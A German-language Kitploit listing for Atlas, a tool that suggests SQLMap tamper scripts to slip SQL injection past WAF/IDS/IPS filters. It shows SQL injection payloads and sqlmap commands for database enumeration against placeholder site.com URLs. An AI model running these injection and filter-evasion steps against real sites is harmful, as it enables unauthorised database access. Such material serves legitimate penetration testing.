Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Atlas — Quick SQLMap Tamper Suggester | Kitploit
Tools/GitHubGitHub/m4ll0k/atlas
SchwachstellenscannerWAF-UmgehungWebsicherheitPenetrationstests
GitHubm4ll0k/atlas

Atlas

Quick SQLMap Tamper Suggester

Repository anzeigen
1.4k276vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Atlas – Schneller SQLMap-Tamper-Vorschlag v1.0

Atlas ist ein Open-Source-Tool, das SQLMap-Tamper vorschlagen kann, um WAF/IDS/IPS zu umgehen. Das Tool basiert auf dem zurückgegebenen Statuscode.

atlas_main

Screenshot

atlas_run

Installation

root@kitploit:~
$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py # python3+

Verwendung

root@kitploit:~
$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Injektionspunkt (mit %%inject%%):

get:

root@kitploit:~
$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

post:

root@kitploit:~
$ python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

headers:

root@kitploit:~
$ python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

Tamper-Verkettung:

root@kitploit:~
$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v

Liste der Tamper abrufen:

root@kitploit:~
$ python atlas.py -g

Beispiel

  1. SQLMap ausführen:
root@kitploit:~
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3

sqlmap

Price_ASC') AND 8716=4837 AND ('yajr'='yajr wird von WAF/IDS/IPS blockiert, jetzt mit Atlas versuchen:

root@kitploit:~
$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

atlas_succ

An diesem Punkt:

root@kitploit:~
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

Das neue Update wird bald verfügbar sein. Bleiben Sie auf dem Laufenden.

$ BurpSuite

Tool herunterladen